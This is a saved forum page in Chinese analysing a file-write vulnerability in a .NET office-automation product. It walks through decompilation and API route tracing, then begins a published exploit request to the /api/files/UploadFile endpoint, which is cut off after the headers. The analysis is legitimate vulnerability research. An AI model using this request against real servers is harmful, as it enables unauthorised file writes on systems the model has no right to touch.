Penetration_Testing_POC/books/易宝OA文件写入+读取漏洞分析.html

<!DOCTYPE html> <html><!--
 Page saved with SingleFile 
 url: https://forum.butian.net/share/2776 
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
<title>易宝OA文件写入漏洞分析</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-某.net程序文件写入漏洞分析>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>@media(max-width:767px){}</style>
<style>/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h1,h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}.text-muted{color:#777}ul{margin-top:0;margin-bottom:10px}.list-inline{padding-left:0;list-style:none;margin-left:-5px}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and (orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:7
<style>/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,d09GMgABAAAAAS1oAA0AAAAChpgAAS0OAAQBywAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGiAGYACFchEIComZKIe2WAE2AiQDlXALlhAABCAFiQYHtHVbUglyR2H3kYQqug2BJ+096zq1GibTzT1ytyoKAhnlGvH2XQR0B9xFqm6jsv/////kpDFG2w7cQODV9Pt8rYoUCGaTbZJgmyTYkaFAZFtCUREkKFtVPCsorbhAUNA1HuRggbAO2j72UBAaO+EokdExs/1s2/5o1Kiiwimf3Fl5lPJKaenrF62Fznwl24G3XqwUR4KiM7gSbp6V6LraldwKxM2QRIqecFxZciCUTN9Q9A6NG4N0pSnLEZjvE6c2UsJeIlMLTH7xWVLXQ1hSFQmKNIGO5kb6eVxbv+g3bqHirnwdc+C7jHEeo027jiVLyf8XLtu6DiwL+oT3+EzQdP8n9hCQyU0dLBEVY/eIK2L6xNeH50/9c/le2CSFhtd6Lgf1bcWgDPxoJmdi3vDhdu2H8wEOySeKDzajOrC7w/Nz622jYowx2KhtMCLHghqwvypWjKiNHqNjoyQsMEFUUFS0MRID+/SsPAvtO+3z0mAQ5rYn8UgOP/Fzzqk6kQ9ORJ+o/KkQSRGkJIwEVBSLW4GCYjSKEc38f+rs7yyvzrzX772jYmw2kboLSUzpaX3bjCbgNOOUbSwnyxbL8yO916Wzf1J3AaJidcC2LEuWC8YGm+J2iwPbCG1fLcDA5lxIi537jkhI/qrzk+oHxsI/mJbTbfMLOVCIrdgpOedKqIYkxr2InOex9Dj46Mfazs5+uTvEchWNbr89JBEatR+UTmRkbhshJ66m8OM7s/SsOJm8J9lOpu0eIX8tGAZKGcq20y7g2PqR7livPQwsEgQOkJseImA6GKL/Gw8JCSB7je+e3OC8EstLISefAKEtRkiUnAmJIyR+m1pfhLmdEBK1A041VlU4RsivHKKOJRRQ1Pvdq9rb+wYIDIZDcAgCJARRGaK0u9oQnXKs7KLKvZvuumu7a9obpzPZtxPROlIRJR4QtoEye/SH3qn1kh1oJbspOMkR9gD48QEPGApJTEuQNnb0I+37s+7+Biw70KY2h6BOmjLOaHa3Dw4I/u9/zf7rDE9Pkad0IxaFBuJ4VInvqkJmAp2ehHFeFiOcrp+WP3v+NWKKSeLgJS1XWpDruWKkQaMTDF7kMc3ZbjUZ+a7pitemTlGdWSf65t3NEpYE/JFTBNwYH6YhdCIgBmBiM+n3JZMH9O8zNbsCFNFmdjurndXObM6s7jmcOmpnZj9ncpv1cP94nyCAD3wS/CAkCCBlEpQcEpRaFCjFFCR3KFpyU5DodiubWtkcz9Zx9k2i7B6b7s3q3ZltPyZzW/bldJlTklNqjqc5nK/j9z+tfNrqDfHwxT5HDswGLBBiRNW3Xqn0ql6px90bOmyKM469TkGaYKs1C5wyNrMBTPlwU/IJQd+nL1XrCsLWmLS8s7QnOVy0p9WGdLiFEK8h3/b2+rca/RuBbAAGhSBQTVK0mpA5boAKzWAVEhMoyhBA0iBIeSlN0mRNyg2QHDXp1KQTSCfSkZoc8m1TPPro23Ema7wpXM97O+4xxcNt+QebONt74YvVWIQx3S0zx5qQkSmCQiiEkSz7JfWTELC2to0ExAsFBd3923efb36+mHTt8EhXOGyQ1FoRCXKk47//PWWzGuzfMSvmBwUvyY4xVz/WsHLuEg44OVBMxtIBPnVvOSDFGDEgdMOYq8N1Y6edke7EQLP5XUsUEFLvf2JO/7uSdvuTtNQaqqgouCKKg3nrvbt7HAxjrv+P5vNzY3qmGSaucDWn5QShLGqzbiCia07EIYMug25e9/hVdR8AQHz8GD92tT73B7kdudwckXIYVWHcSFIgCxqPEPq51/jVkQCT80kNRInfy4tRv71+cOkKgNyNOzu4bvn5jUwYFyShdPkJOgloRkNZoe3eVE+gRk4dTn59F/ExImCzqPyf2GHPB8sozT9IIBGXlocfxFyWzeV1yjATTNS19fEnte26vb7NlFBibm1Pv5jrtt39jb8CGEpsiz8CAQie5XOr5wWIMCwOOIx4yULy+va+QhnH5ZFGiRAUn1/fG1JpWh34/7fUfmUjFWqwEbF3/WhPYyomRjYMrFlxwZIFe4l9P8nzPvd1Hvu2LvM0Ds5oJQVnlGAEpybX5yC4yxIpqaxSNRjlSIx9saf/y6Swa9yp2xyQJ0qZ3k+/AEmI2xO2nV/vs38FkXFPYifWSMefAEJZRU2jAxw2yHaEgTWqEE5KDeUVAU+ITgcaRgtOeCgxkjoBXLrfq0Pga45joGI4BVH0CRNk4RhbTBQoZWwcKzJ1Le7QYdaYZKKONTuiTiTU9iKiSKqPEKtTRrpv6zJpqCKK2VyzaAQ3SYz2oDxTQ08CrRm4lsiQSKAe4kV3IQEuH9fp/SFCUxJDqmcexJ2JY+MOueRzKtWnc4koNW2UPXHGyoplovvxWZELJOtcPhBmTjiAcZeMeOojdgqlNnVt7wngGZ2wYNtOTS1KAFz0EEa3x3LpRAKAHrVa0zCTByMn6qWIbuwR0kdqTILahlgUG8qMokGqnfFnWXOZKrJZytwHx17ZtZg7ItgdJGhifz25FhnPmxOYMN52SDyXVnZ/gWObXwBcWYoD7KPodztkQhYCg4sDToOEMxshJM7n57Tn4t5JfFCYIH4TJhPkA2TFLsgDG9Sw6QItYQfz+mEZCSsrwhOSOboubVL46TTjY3mvnrkji1XVwkZX7gh1vQ3cCRdpL/Ccr5RmfoA03fBsg+sOWFP0OcOEG/cxRZ3wvTNAkP3aaxOI3BVAFycjo7y2Y6y92W7qqSC68RXvU187rCX77kmK0MEru/gu80wa2EMCeLHr7h4evvrqhrF3CdrNVtuCgIG6qOGkwMP5RXhmfkhgvekwH7whZJToQFF7T2gxiRcXsUjBtkbDq9V6cxqNN/Pdibazxpx0D3J2zOip0mudu4ZoZVMzt9uHdpk5hHF8q0+C75dLKZVVXPKWQdIlo7m7AsRvHntsPIbbS7j/up3NjqKkjmmzj/FI60eASYV6nT02mldXbzDr2Qt8Fd4lQfcaamREKSENgKlwd67I7l+Cs+s7uPGm22OXRCPp/8uBTZDA3k56nPIFtwRwsF6PQ0R43sJ4aimENU/IOfsNoWDR0kVEWO548Y0g3ZJHVcjA7cuvDsSZqgSp79baiZwuJQ23v7bOiLF+DOPx+j3/CBoWQxNvpikNRoQ388rnJFqk/Si3Z8Hrb0Ktpw3bxpzAQN7lJvLD2mXuewbq4uWOo6AIbKCwZopfxlJ4mU5bp10MrpsHOGAtM5lztKbBknt/UGoB3hm4V3VjOe+FuK6phBtbPh3qLZ8uRKLcjln6H/ebFQ+AHmSHDM/C2AeisisYXnuTrrlD7veJsW3gxNnwLKaxQE48spAd2tnQ+PKJrx9/Di6NlFbx5k3w2hFT7CvTXESeK6LaUqJ80Ta1C+IncVxU4N0CppXzHB45h0SEBlg8fyTtcImA3gciu+mFppL8JJvStwveLPlwH7tz+aVU084a3f6vYrv/1E5rSZEeX+ahYNXmCkboiB/qV5OfVv+UJdnRdwitfqmkxETUkNnCy90q87N4afIeuHlbclqqhwCZW1MltEeb3BhzYEY844WjhbOsIKLBVosr/vMhK62W9/WKuNiNizl5n2vFwWZikTgy3gZz3n1sO1spZSTE+IlUnYaWa62DkuApmnaPtqk5rAGE4xune9N1E/J1j3SPyN6zQEXj9D58Q/baPFw0JQiXUnbhDKW26eXE6Kra9EDXukPMOFyR+H4pFCNrfL65LmHrb6q62gO6MDBHlHEwHRQl8fzwE6GZaHCLqboNTP+c3iKMKz6O7Oa1JaoLXk3LiphOmnPTyAZxjrQ9lRKwD77u5eSmhrBLETRy5y0q7+cl6NpoI9clO3BQ6aaUaNZDPffO+traDZca5SYUKaliYYTGS0z4QL/5nuR0uiGifjLt
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.mt-30{margin-top:30px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-keyword{color:#00f}.hljs-string{color:#a31515}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body h1{margin:.67em 0;padding-bottom:.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h1,.markdown-body h2{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body a:not([href]){color:inherit;text-decorati
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="global-nav mb-50" style="display:none !important">
 
</div>
<div class="top-alert mt-60 clearfix text-center" style="display:none !important">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main">
 <div class=widget-article>
 <h3 class="title word-wrap">某.net程序文件写入漏洞分析</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 前段时间看到公开了一个漏洞payload很奇怪，正好有空就分析了一下，也是第一次接触了.net的代码审计，一通分析下来，发现和审计java和php的思路是一样的...
 </div>
 <textarea id=md_view_content style=display:none>前段时间看到公开了一个漏洞payload很奇怪，正好有空就分析了一下，也是第一次接触了.net的代码审计，一通分析下来，发现和审计java和php的思路是一样的...

在拿到源码后，发现这个oa是用.net编写的，基本所有的预编译的ASP.NET的Web应用程序使用的.Net程序集（通常是DLLs）都默认放在`bin`文件下，这一点和java写的程序中将jar都放在`WEB-INF/lib`中类似。.NET的DLL和Java的JAR都是用于打包和分发代码的文件格式。.NET的DLL是用于.NET Framework的动态链接库，而Java的JAR是用于Java平台的Java归档文件。

通常反编译.net的工具dnSpy, ILSpy等，但是由于ILSpy一直在维护更新，大部分人都偏向于使用这个，虽然dnSpy工具以及在2020年已经归档，但是在github通过`dnspy fork:only`搜索到仍有非官方的爱好者对该工具进行维护，例如项目地址:[dnSpy](https://github.com/dnSpyEx/dnSpy)。

0x01 路由分析
=========

首先查看`Global.asax`，他 是 ASP.NET 应用程序中的一个文件，它作为处理应用程序级事件和自定义应用程序行为的中心位置。通常被称为全局应用程序类。其中的`Inherits`中定义了定义供页继承的代码隐藏类

![image-20240117141338001](https://shs3.b.qianxin.com/butian_public/f254459b561f61707247df17139e2adaff4e52a0f1cd3.jpg)

然后再dnSpy中搜索这个类目（最好打开全词匹配排除其他干扰项），然后在`Application_Start`中定义了在应用程序启动时运行的代码

![image-20240117141504795](https://shs3.b.qianxin.com/butian_public/f5542138cfbe189446e7ad06d871418f92c25ab942f10.jpg)

通过`WebApiConfig.Register`可以看到这里定义了通过api访问的路由，定义了包含控制器和方法

在 ASP.NET Web API 中，*控制器*是处理 HTTP 请求的类。控制器的公共方法称为*操作方法*或简称为*action*。当 Web API 框架收到请求时，它将请求路由到操作。

![image-20240116182828997](https://shs3.b.qianxin.com/butian_public/f4091724d1a98180b858e4e335685d9d22e4a2fc97d3d.jpg)

然后在`WebApi.Areas.Api.Controllers`命名空间中寻找到所有控制器和方法

![image-20240117144434626](https://shs3.b.qianxin.com/butian_public/f66062635fc02c9e87b6caecca8ef31bb44a96a49c7aa.jpg)

0x02 漏洞分析
=========

首先查看payload

```php
POST /api/files/UploadFile HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
